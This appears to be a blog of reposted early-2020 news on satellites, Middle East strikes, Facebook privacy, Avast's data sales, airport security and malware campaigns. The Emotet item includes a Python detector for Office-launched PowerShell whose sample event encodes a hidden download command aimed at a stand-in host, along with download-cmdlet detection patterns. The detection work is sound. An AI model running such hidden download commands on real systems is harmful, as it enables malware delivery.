Monday, February 10, 2020

NATO general complains about Russian Kosmos satellite, claiming it is spying on military intelligence satellites

Last month, a Purdue University graduate student specializing in astrodynamics reported that Russia’s Kosmos-2542 satellite had begun shadowing USA-245, an American reconnaissance satellite. Kosmos-2542’s mystery mission quickly sparked hysteria among the US media, with some observers suggesting it could be preparing to “attack” its US counterpart.
Russian and Chinese satellites maneuvering near Western powers’ satellites in space are a threat to the NATO alliance, Allied Command Transformation Commander Gen. Andre Lanata has said.
“Of course, it is a threat to our allies,” Lanata said, speaking to The Washington Examiner. “Until now, space was considered by everybody as a safe haven. It’s not the case anymore,” he added.
According to the commander, the danger posed by Russia and China in this area is “a key question,” and NATO “need[s] to be sure that we give to our forces this space asset support.” Lanata clarified that NATO as an organization would not “own any space assets,” and that it was not the bloc’s responsibility “to take specific measures to protect such or such national assets.” The problem will have to be addressed by the bloc’s individual members, he indicated.
Recently, US media have reported on the activities of Russian inspector satellite Kosmos-2542, indicating that the satellite was stalking USA-245, a spy satellite used by American intelligence agencies. According to amateur satellite observer and Purdue graduate student Michael Thompson, the Russian spacecraft has come to within 150 to 300 km of its US counterpart, and viewed it from various angles. The researcher avoided jumping to any conclusions, saying that although Kosmos-2542’s behaviour might seem suspicious, he could not prove any malign intent.
However, US media rushed to alarming conclusions, suggesting the Russian satellite’s behaviour may be “some kind of preparation for an attack,” and that Kosmos-2542 may actually be a “killer satellite” getting ready to ram or shoot lasers at USA-245.
Kosmos-2542 was launched from the Plesetsk Cosmodrome in November 2019, with the stated mission of inspecting the condition of other Russian satellites orbiting the planet.
Last month, observers reported that Kosmos-2491, another Russian satellite capable of maneuvering and inspecting other satellites in orbit, appeared to have broken up. Amateur observers suggested that the satellite, believed to have been dead for several years, may have deliberately self-destructed.
Russia isn’t the only country thought to engage in clandestine inspections of foreign satellites in orbit. In 2019, the Secure World Foundation reported that the US used its own secretive ‘Geosynchronous Space Situational Awareness Program’ to approach and inspect Russian, Chinese, Pakistani and Nigerian satellites, both civilian and military.
In late 2019, President Trump formally ordered the Pentagon to establish Space Force, the sixth branch of the US armed forces. Observers have expressed fears that the force’s creation could lead to the militarization of space.
Iran unsuccessfully launched its fourth satellite, called Zafar ("Victory" in Farsi), into orbit on 9 February. It was preceded by two unsuccessful launch attempts in 2019 and is expected to be followed by the delivery of four more satellites.
The launch, however, was denounced by the US, which claims the carrier rocket can be used to deliver nuclear warheads and that the whole project was cover for a long-range ballistic missile test.

Iranian flag fluttering in front of Iran's Safir Omid rocket, which is capable of carrying a satellite into orbit, before its launch in a space station at an undisclosed location in the Islamic republic
Tehran denies that the rocket carrier is intended for military use, indicating that the satellite's mission will be to take ground photos and collect data needed to study earthquakes and deal with other natural disasters. Iran has also long denied pursuing the goal of producing nuclear weapons, insisting that their use goes against Islam. The Islamic Republic's authorities have also repeatedly pointed out that its nuclear sites are monitored by the International Atomic Energy Agency (IAEA).

The US and Israel, however, have refused to retract their accusations. Instead, in 2018 the Trump Administration withdrew from the Iran nuclear deal, which had limited the country's nuclear programme's development, and imposed sanctions against the Islamic Republic. The imposition of sanctions has led Tehran to stop adhering to the deal's provisions, almost two years after Trump first called the accord's existence into question.


The Russian Defence Ministry stated on 7 February that a civilian Airbus-320 with 172 passengers on board was nearly destroyed amid Israeli airstrikes near Damascus in the early hours of 6 February.
An Airbus-320 was captured on video landing at the Russian-operated Hmeymim Airbase in northwestern Syria while trying to avoid Israeli shelling.
Russian TV channel Zvezda has published camera recordings from the Hmeymim Airbase, showing how the Airbus-320 successfully lands and, after the end of the strikes, takes off again in the direction of Damascus International Airport.
On 6 February, four Israeli F-16 fighters fired eight air-to-surface missiles in the suburbs of Damascus, according to the Russian Defence Ministry.
The Syrian air defence systems that were on alert responded to the attack while a civilian Airbus-320 with 172 passengers was almost caught in the cross-fire. The plane managed to leave the area and successfully land at Russia’s Hmeymim base, the closest alternative airfield.
Syrian diplomats slammed Israel for "taking advantage of the fact that Syria is busily engaged in its war against the terrorist groups in Idlib, and taking cover behind civilian flights, with complete disregard for the lives of civilians".
The Israeli Defence Forces (IDF) have declined to comment on the situation.
Russia and Syria have already accused the Israeli air force of using other aircraft as a shield and putting the lives of innocent people at risk. In September 2018, the Russian military held Israel responsible for an Il-20 plane crash in Syria, which claimed the lives of 15 Russian servicemen. The plane was accidentally downed by a missile launched via Syria's air defence system at Israeli F-16 jets that were carrying out airstrikes in Latakia Province.
The Emergency Services Telecommunications Authority (ESTA) in Victoria, Australia has decided to use artificial intelligence (AI) to help Triple Zero call takers (000) identify the incidence of a heart attack on the phone without wasting much time.
According to Health Minister Jenny Mikakos, the state government’s coffers will grant $1.36m to Ambulance Victoria for designing and implementing the Cardiac Arrest Project in collaboration with Monash University.

Furthermore, an additional $350,000 will be given to Ambulance Victoria from the Safer Care Victoria innovation fund to start offering SMS and video calling facilities under the Tele-HELP project for mental health-related emergency callers.
As per the details shared by the ministry, the AI technology will run in the background all the time and monitor every incoming emergency call to identify similar patterns of sound, keywords, and language for detecting cardiac arrest symptoms.
The government states that the system will instantly alert the ESTA triple zero call takers after which a high-priority ambulance will be dispatched and “talk bystanders through CPR or defibrillation.”

Through this project, the government aims to save 185 more lives per year. In incidents involving heart attacks “every second counts,” Mikakos explained, and AI will help paramedics provide medical help quickly to reduce the likelihood of brain damage and death.

Saturday, February 8, 2020

Facebook has finally rolled out the Off-Facebook Activity tool that it has been working on since August 2019.
The tool can help you limit Facebook’s tracking of your activities, something that the social network has received immense criticism for, and determine how far you can allow it to monitor your activities on other websites. You can also decide what information you want to be associated with your Facebook account.
Off-Facebook Activity turns off the storing and sharing of data sent to Facebook by the third-party apps and websites that Facebook users access. This data is how Facebook manages to keep tabs on all your activities. Even if you use a Ring Doorbell app, this would be recorded by Facebook.
The volume and magnitude of the data collected by Facebook is immense. And, it is indeed a great idea to rebuild the lost trust of Facebook users by allowing them to Clear History, a term Facebook’s CEO Mark Zuckerberg has associated with the new feature.
For your information, third-party apps and websites use the Pixel and Software development kit (SDK) from Facebook to store information about all your activities and the devices you use. This information is regularly shared with the social network, which uses it to bombard your computer and mobile screens with targeted ads.
Therefore, if you wonder how Facebook started displaying ads related to the product you just checked out on Amazon or eBay, this is how it is done.
Off-Facebook Activity is a welcome change from Facebook and can be seen as a step towards upholding consumer privacy, something that the company so far has compromised upon to a great extent. This tool is part of a multi-step strategy to address these issues. As explained by Zuckerberg:

“Other businesses send us information about your activity on their sites and we use that information to show you ads that are relevant to you. Now you can see a summary of that information and clear it from your account if you want to.”


You can find this tool in your Facebook Settings menu under the Your Facebook Information option. There you will find several options including Manage Your Off-Facebook Activity that allows you to determine the information you want individual sites and apps to share with Facebook.
Settings >> Your Facebook Information >> Off-Facebook Activity >> Manage Future Activity >> Turn the toggle *off* and disable Future Off-Facebook Activity.
The Clear History option wipes all the information Facebook has stored so far about you and Manage Future Activity lets you choose what sort of information you want Facebook to collect and store about you.
Cybercriminals are always looking out for ways to capitalize on anything that can generate instant clicks or trick users into downloading malware. It could be trending news or natural disasters. This time around, crooks have chosen none other than the entertainment industry’s biggest and most anticipated event: the Oscars.
Reportedly, cybercriminals are using Oscar movie nominations as bait to lure users into downloading malware.

According to a press release by Kaspersky Labs security researchers, there are hundreds of phishing and malware-infected websites ready to distribute malicious software. The malware is hidden in files claiming to be “free downloads” of movies nominated for Oscar’s best picture award for the year 2020.
As it always happens with phishing scams, unsuspecting users are tricked into providing personal and sensitive information including credit card details to download a free version of Oscar-nominated movies such as Joker.
The event is due to be held on February 9, 2020, and this seems to be a perfect time and opportunity for scammers to make money from the hype generated for Oscar-nominated movies.
Kaspersky identified that Joker is the most widely used movie for tricking users into handing out financial details and downloading malware.
One such scam targets the Oscar-nominated movie Ford v Ferrari.
As per Anton Ivanov, malware analyst at Kaspersky, scammers don’t really care about the dates on which a movie premieres because they aren’t distributing the actual movie but malicious software using the movie name as bait.
1. 1917
2. Ford v Ferrari
3. Jojo Rabbit
4. Joker
5. Little Women
6. Marriage Story
7. Once Upon a Time in Hollywood
8. Parasite
9. The Irishman
To stay protected, never download any file from illegitimate or unknown streaming platforms, and use only legal streaming websites to eliminate the risk of infecting your device or revealing bank details. In this regard, you can rely on services like Amazon Prime, Netflix, Disney+ and Hulu.
Furthermore, always research a bit about the website you are going to select a movie or video from before hitting that download button. Last but not the least, do remember that if something seems too good to be true, it actually isn’t worth your time or effort.

Saturday, February 1, 2020

Coronavirus emergency is being used to spread dangerous Emotet trojan


We have seen cybercriminals exploiting global events such as the Football World Cup and Christmas, or disasters like the missing Malaysia plane (MH-370), to spread malware or misguide the masses. But this time, Coronavirus, a global health emergency, is being used by crooks not only to spread malware but also to siphon off sensitive and personal data from unsuspecting users.
Cybersecurity firms IBM X-Force and Kaspersky have identified a new campaign in which botnet-driven, malware-infected emails are being sent to unsuspecting users. What makes it utterly disgusting is the fact that scammers are using the coronavirus theme to trick the recipient into opening them.
Reportedly, these emails contain attachments, which are promoted as notices containing details of coronavirus infection prevention measures.
It is indeed ironic that scammers are using the name of coronavirus to distribute another malware widely known as the Emotet Trojan. Previously, the Emotet malware was distributed through corporate-style payment invoices and notification emails only, but this time around the impact of the campaign will surely be higher given the global nature of coronavirus infection scare. 
IBM X-Force observed that a majority of these emails are written in the Japanese language, which suggests that the attackers are deliberately targeting users from locations most affected by coronavirus outbreak. 
The subject line of the emails contains a Japanese language word that means notification, and displays the current date to generate an environment of urgency. Furthermore, the emails are disguised as infection prevention information sent by a Japan-based disability welfare service provider.

[Screenshot of the email. Screenshot and translation credit: IBM X-Force]
In a blog post, the IBM X-Force team wrote:
“The text briefly states that there have been reports of coronavirus patients in the Gifu prefecture in Japan and urges the reader to view the attached document.”
There are several versions of the email, all using the same language but naming different Japanese prefectures: some mention Osaka, others Tottori. The email ends with a footer displaying an authentic mailing address, fax and phone number of the targeted prefecture’s relevant health authority.

Apart from using the coronavirus theme, the rest of the campaign strategy is rather mundane. When the recipient opens the attached document, an MS Office 365 message appears asking the user to enable content in case the document opens in a protected view.
If the document opens with macros enabled, a hidden VBA macro script enables PowerShell to activate the Emotet executable and download the malware. It is the same technique used in all the previous Emotet email campaigns, said IBM X-Force researchers. 
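The macro-to-PowerShell step described above is visible in process-creation telemetry. The following is an added example, not code from IBM X-Force or Kaspersky: it assumes events with Sysmon-style `ParentImage`, `Image` and `CommandLine` fields, and the sample events, host name and file names are constructed.

```python
import base64
import binascii
import ntpath
import re

# Office applications that should rarely, if ever, start a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_HINT = re.compile(
    r"invoke-webrequest|net\.webclient|downloadfile|downloadstring|start-bitstransfer",
    re.IGNORECASE,
)


def _flag_value(tokens, full_name, extra=()):
    """Return the value after a PowerShell flag written as any prefix of full_name."""
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("-") and len(tok) > 1:
            name = tok[1:].lower()
            if full_name.startswith(name) or name in extra:
                return tokens[i + 1]
    return None


def decode_encoded_command(payload):
    """-EncodedCommand carries base64 of a UTF-16LE string; return the text or None."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(event):
    """Return findings for an Office -> PowerShell process start, else None."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    if parent not in OFFICE_PARENTS or child not in POWERSHELL:
        return None
    reasons = [f"{parent} started {child}"]
    tokens = event["CommandLine"].split()
    if (_flag_value(tokens, "windowstyle") or "").lower() == "hidden":
        reasons.append("hidden window")
    script = event["CommandLine"]
    payload = _flag_value(tokens, "encodedcommand", extra=("ec",))
    if payload is not None:
        decoded = decode_encoded_command(payload)
        reasons.append("encoded command" if decoded else "undecodable encoded command")
        script = decoded or script  # inspect the decoded script when available
    if DOWNLOAD_HINT.search(script):
        reasons.append("download cmdlet or API in script")
    return {"reasons": reasons, "script": script}


def _enc(text):
    """Encode text the way -EncodedCommand expects (used to build the sample)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed events, not taken from the campaign
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": PS,
     "CommandLine": "powershell.exe -w hidden -enc "
                    + _enc("Invoke-WebRequest -Uri http://example.invalid/notice -OutFile notice.bin")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -ExecutionPolicy RemoteSigned -File backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 8192"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ntpath.basename(ev["ParentImage"]), "->", triage(ev))
```

A macro that starts PowerShell through an intermediary process will not show an Office parent, so treat this check as one signal alongside macro-blocking policy rather than a complete detection.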
However, Kaspersky states that the Emotet malware campaign is just one of the many campaigns utilizing the coronavirus scare to attract unsuspecting users. They have identified 10 different documents aiming to infect devices using coronavirus theme.
“The discovered malicious files were masked under the guise of .PDF, .MP4, .DOC files about the coronavirus [containing] video instructions on how to protect yourself from the virus, updates on the threat and even virus-detection procedures.” In reality, the files deliver Trojans and worms that can destroy, block, copy or modify data or interrupt computer/network operations, explained Kaspersky researchers.
Coronavirus originated in China’s Wuhan province and rapidly transformed into a global health crisis. Apparently, scammers and cybercrooks have nothing to do with the planet as they consider it a wonderful opportunity to infect a few devices. To protect their devices, users must not click on such emails or download their attachments.

Friday, January 31, 2020

https://uccinfo.blog/2020/01/31/ucc-highlights-january-2020/?fbclid=IwAR3UHshF_SbPhtEaBNkRbkwdIvABsgsdoqk4XxajETCcQtm_aZqx1PnW5hk


On 28/1/2020 it was reported that Avast was stealing user data and selling it... Are you safe?

The anti-virus giant Avast has announced shutting down one of its subsidiaries called Jumpshot after the company was found stealing user data and selling it for big bucks.
On January 28th, 2020, an investigation by PCMag and Vice reported that Avast was secretly stealing browsing data from millions of its customers and selling it to third parties. Some of its active buyers included Google, Pepsi, IBM, Yelp, Microsoft, TripAdvisor, and Unilever, etc.
Avast’s data collection worked or still works in such a way that the software collects all of your browsing data which is then accessed by Jumpshot. The latter in return takes it and uses it as a part of what makes up its product offerings.
An example of it is Avast’s “All Clicks Feed”, which lets companies access your behavior on the internet and any clicks you make on any particular range of domains. Reportedly, Avast sold user data to one of its New York-based customers for a hefty sum of $2,075,000.
[Figure: How Jumpshot functioned. Image credit: Motherboard]
However, in a blog post published on 30th January Avast CEO Ondrej Vlcek apologized to their customers and announced shutting down Jumpshot.
“Protecting people is Avast’s top priority and must be embedded in everything we do in our business and in our products. Anything to the contrary is unacceptable. For these reasons, I – together with our board of directors – have decided to terminate the Jumpshot data collection and wind down Jumpshot’s operations, with immediate effect,” wrote Vlcek in his blog post.

Vlcek also maintained that Jumpshot did not break GDPR rules and committed themselves to 100% GDPR compliance.
“Jumpshot has operated as an independent company from the very beginning, with its own management and board of directors, building their products and services via the data feed coming from the Avast antivirus products,” Vlcek added.
“During all those years, both Avast and Jumpshot acted fully within legal bounds – and we very much welcomed the introduction of GDPR in the European Union in May 2018, as it was a rigorous legal framework addressing how companies should treat customer data. Both Avast and Jumpshot committed themselves to 100% GDPR compliance.”

This is not the first time Avast has made headlines for stealing customer data. In December last year, Google banned Avast security extensions, including AVG security, over data snooping.
Nevertheless, the damage for Avast is done and it may be too late to apologize or shut down Jumpshot. As a customer, the main purpose of using anti-virus software is to protect our data from online crooks, malicious hackers and cybercriminals, and Avast has turned out to be all three.

Thursday, January 30, 2020

The cyber security status of top 100 airports, where is ENTEBBE?



New research from web security company ImmuniWeb finds that 97 out of 100 of the world’s largest airports have security risks related to vulnerable web and mobile applications, misconfigured public cloud, Dark Web exposure or code repository leaks.
The 2020 annual meeting of the World Economic Forum (WEF) urged the consideration of emerging cybersecurity challenges in the aviation industry, addressed in its “Advancing Cyber Resilience in Aviation: An Industry Analysis” report.
To shed some light on the current state of aviation transportation security, ImmuniWeb decided to conduct research on cybersecurity, compliance and privacy of the world’s largest airports.

Key findings

Top 3 Most Secure Airports:

During the research, ImmuniWeb identified three international airports that successfully passed all the tests without a single major issue being detected:
— Amsterdam Airport Schiphol (EU)
— Helsinki-Vantaa Airport (EU)
— Dublin Airport (EU)

Main Website Security:

Application weaknesses and software vulnerabilities continue to be the most common means by which cyber criminals carry out external attacks, says Forrester in its recent research.
Regrettably, only 3 main (“www.”) websites of the airports received the best possible “A+” grade, and 15 got an “A” grade.
As many as 24 of the main websites had a failing “F” grade, meaning that they had outdated software with known and exploitable security vulnerabilities in a CMS (e.g. WordPress) and/or web components (e.g. jQuery). Some of the websites even had several vulnerable components, as detailed below:
— 97% of the websites contain outdated web software
— 24% of the websites contain known and exploitable vulnerabilities
— 76% and 73% of the websites are not compliant with GDPR and PCI DSS respectively
— 24% of the websites have no SSL encryption or use obsolete SSLv3
— 55% of the websites are protected by a WAF

Mobile Application Security:

During this research, we found and tested 36 official mobile applications belonging to the airports. In total, 530 security and privacy issues were identified, including 288 mobile security flaws (15 per application on average). We found that:
— 100% of the mobile apps contain at least 5 external software frameworks
— 100% of the mobile apps contain at least 2 vulnerabilities
— 15 security or privacy issues are detected per app on average
— 33.7% of the mobile apps outgoing traffic has no encryption

Dark Web Exposure, Code Repositories and Cloud:

Compared to the Fortune 500 companies’ exposure, global airports are doing fairly well. For the purpose of this research, ImmuniWeb leveraged its award-winning AI technology to distil findings from the Dark Web marketplaces and other locations, notably to remove duplicates, fakes and irrelevant findings.
After purification of the results, the research team found that 66 out of the 100 airports are exposed on the Dark Web in one way or another. 13 airports have leaks or exposures of a critical risk:
— 66% of the airports are exposed on the Dark Web
— 72 out of 325 exposures are of a critical or high risk indicating a serious breach
— 87% of the airports have data leaks on public code repositories
— 503 out of 3184 leaks are of a critical or high risk potentially enabling a breach
— 3% of the airports have unprotected public cloud with sensitive data
Ilia Kolochenko, CEO & Founder of ImmuniWeb, comments: “Given how many people and organizations entrust their data and lives to international airports every day, these findings are quite alarming. Being a frequent flyer, I frankly prefer to travel via the airports that do care about their cybersecurity. Cybercriminals may well consider attacking the unwitting air hubs to conduct chain attacks of travellers or cargo traffic, as well as aiming attacks at the airports directly to disrupt critical national infrastructure.
Today, when our digital infrastructure is extremely intricate and intertwined with numerous third-parties, holistic visibility of your digital assets and attack surface is pivotal to ensure the success of your cybersecurity program. Without it, all your efforts and spending are unfortunately vain.”

How to Reduce the Risks

— Implement a continuous security monitoring system with anomaly detection to spot intrusions, phishing and password re-use attacks.
— Run a continuous discovery and inventory of your digital assets, visualize your external attack surface and risk exposure with an Attack Surface Management (ASM) solution enhanced with Dark Web and code repositories monitoring.
— Implement a holistic, DevSecOps-enabled application security program to test and remediate your web and mobile applications, APIs and OSS in a timely manner.
— Implement a third-party risk management program encompassing continuous monitoring of your vendors and suppliers going beyond a paper-based questionnaire.
— Invest in security awareness of your personnel, explain the risks of using professional emails on third-party resources, gamify anti-phishing training and reward the best learners.